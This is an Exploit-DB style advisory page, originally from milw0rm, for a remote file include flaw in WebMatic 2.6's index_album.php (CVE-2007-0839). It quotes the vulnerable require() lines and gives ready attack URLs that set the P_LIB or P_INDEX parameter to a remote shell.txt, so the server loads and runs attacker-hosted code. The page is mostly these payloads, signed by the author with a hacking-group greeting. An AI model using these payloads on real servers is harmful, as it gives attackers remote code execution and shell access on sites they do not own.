WebMatic 2.6 (index_album.php) Remote File Include Vulnerability



EDB-ID: 3281 CVE: 2007-0839 OSVDB-ID: 33126
Author: MadNet Published: 2007-02-07 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com  :)

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --


--Thanks Milw0rm

# milw0rm.com [2007-02-07]






Comments

No comments so far